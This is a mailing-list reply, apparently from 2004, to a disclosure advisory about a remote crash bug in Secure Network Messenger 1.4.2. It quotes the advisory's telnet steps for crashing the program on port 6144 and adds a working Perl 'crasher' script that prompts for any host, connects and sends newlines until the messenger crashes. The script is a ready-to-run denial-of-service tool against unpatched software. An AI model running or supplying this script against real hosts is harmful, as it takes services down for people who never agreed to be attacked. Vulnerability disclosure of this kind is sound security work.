Re: Crash in Secure Network Messenger 1.4.2

["r`Futile" <clearscreen@xxxxxxxxxxxxxx>]

And here is my proof of concept:

#!/usr/bin/perl

use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
       Proto => "tcp",
       PeerPort => "6144",
       PeerAddr => "$h"
) or die "\nNo response from host.";

sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;

Greetz, clearscreen :)


----- Original Message ----- 
From: "Luigi Auriemma" <aluigi@xxxxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>; <bugs@xxxxxxxxxxxxxxxxxxx>; 
<news@xxxxxxxxxxxxxx>; <full-disclosure@xxxxxxxxxxxxxxxx>; 
<vuln@xxxxxxxxxxx>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2


> #######################################################################
>
>                             Luigi Auriemma
>
> Application:  Secure Network Messenger
>              http://www.networkmessengers.com/msg/
> Versions:     <= 1.4.2
> Platforms:    Windows
> Bug:          crash
> Exploitation: remote
> Date:         12 November 2004
> Author:       Luigi Auriemma
>              e-mail: aluigi@xxxxxxxxxxxxxx
>              web:    http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> --- 
> Luigi Auriemma
> http://aluigi.altervista.org